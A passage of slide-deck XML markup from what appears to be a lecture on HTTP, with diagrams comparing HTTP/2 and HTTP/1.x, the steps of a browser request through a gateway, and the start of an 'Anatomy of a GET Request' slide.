                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="434343"/>
                </a:solidFill>
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>E-Mail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>: 2,000,000 emails </a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Nunito"/>
              <a:ea typeface="Nunito"/>
              <a:cs typeface="Nunito"/>
              <a:sym typeface="Nunito"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4800" u="sng">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Every Second</a:t>
            </a:r>
            <a:endParaRPr sz="4800" u="sng">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HTTP Revisited</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140" name="Google Shape;1140;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HTTP:// Our Favorite Protocol</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1146" name="Google Shape;1146;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7" name="Google Shape;1147;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581825" y="711318"/>
            <a:ext cx="1686791" cy="1179383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1148" name="Google Shape;1148;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6540216" y="762422"/>
            <a:ext cx="1419384" cy="1340650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1149" name="Google Shape;1149;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2496652" y="1221818"/>
            <a:ext cx="3808500" cy="3900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="0B5394"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1150" name="Google Shape;1150;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2451575" y="1658425"/>
            <a:ext cx="3905700" cy="12000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="351C75"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1151" name="Google Shape;1151;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3220700" y="1478150"/>
            <a:ext cx="372600" cy="468600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.docx</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1152" name="Google Shape;1152;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4112925" y="1478150"/>
            <a:ext cx="372600" cy="468600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.mp4</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5005150" y="1478150"/>
            <a:ext cx="372600" cy="468600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt2"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.jpeg</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1154" name="Google Shape;1154;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2451575" y="1040450"/>
            <a:ext cx="312300" cy="336600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B5394"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="0B539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1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1155" name="Google Shape;1155;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134050" y="1496125"/>
            <a:ext cx="312300" cy="336600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="351C75"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="351C75"/>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2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1156" name="Google Shape;1156;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="613850" y="2621131"/>
            <a:ext cx="1686791" cy="1179383"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1157" name="Google Shape;1157;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572241" y="2260797"/>
            <a:ext cx="1419384" cy="1340650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1158" name="Google Shape;1158;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2528677" y="2720193"/>
            <a:ext cx="3808500" cy="3900"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="38100">
            <a:solidFill>
              <a:srgbClr val="0B5394"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1159" name="Google Shape;1159;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2483600" y="3156800"/>
            <a:ext cx="3905700" cy="12000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="351C75"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1160" name="Google Shape;1160;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3252725" y="2976525"/>
            <a:ext cx="372600" cy="468600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">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91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.docx</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Google Shape;1161;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2483600" y="2538825"/>
            <a:ext cx="312300" cy="336600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0B5394"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="0B539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1</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162" name="Google Shape;1162;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166075" y="2994500"/>
            <a:ext cx="312300" cy="336600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="351C75"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="351C75"/>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2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2480063" y="3689863"/>
            <a:ext cx="3905700" cy="12000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="351C75"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166063" y="3503550"/>
            <a:ext cx="312300" cy="336600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="351C75"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="351C75"/>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3</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p66"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2574613" y="4174888"/>
            <a:ext cx="3905700" cy="12000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="351C75"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1166" name="Google Shape;1166;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166063" y="4012588"/>
            <a:ext cx="312300" cy="336600"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="351C75"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="351C75"/>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4</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1167" name="Google Shape;1167;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5253500" y="3946600"/>
            <a:ext cx="372600" cy="468600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">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91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.jpeg</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1168" name="Google Shape;1168;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4214600" y="3437550"/>
            <a:ext cx="372600" cy="468600"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">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91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="900">
                <a:latin typeface="Roboto Mono Light"/>
                <a:ea typeface="Roboto Mono Light"/>
                <a:cs typeface="Roboto Mono Light"/>
                <a:sym typeface="Roboto Mono Light"/>
              </a:rPr>
              <a:t>.mp4</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="Roboto Mono Light"/>
              <a:ea typeface="Roboto Mono Light"/>
              <a:cs typeface="Roboto Mono Light"/>
              <a:sym typeface="Roboto Mono Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1169" name="Google Shape;1169;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700200" y="1890700"/>
            <a:ext cx="1514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ono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>HTTP/2</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1170" name="Google Shape;1170;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="668175" y="3906150"/>
            <a:ext cx="1514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Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>HTTP/1.x</a:t>
            </a:r>
            <a:endParaRPr sz="1800">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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1176" name="Google Shape;1176;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Web Browser issuing a request: </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1177" name="Google Shape;117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8" name="Google Shape;1178;p67"/>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Generates an HTTP request for a specific resource.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="Google Shape;1179;p67"/>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Sends the request to the Internet gateway / access point</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Google Shape;1180;p67"/>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Then, the gateway forwards the request to the target server.</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Google Shape;1181;p67"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>he server receives the request, finds the requested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>resource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> and sends it back to the gateway. </a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4078300"/>
            <a:ext cx="94458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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>he gateway </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>receives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t> the response and forwards it to the original client.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68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277075" y="764775"/>
            <a:ext cx="8312700" cy="4101000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="43434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60000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of a GET Request</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="660000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Google Shape;1189;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0" name="Google Shape;1190;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468375" y="1143525"/>
            <a:ext cx="4675200" cy="3163500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="0"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GET /js/analytics.js HTTP/1.1</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Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto Mono Medium"/>
                <a:ea typeface="Roboto Mono Medium"/>
                <a:cs typeface="Roboto Mono Medium"/>
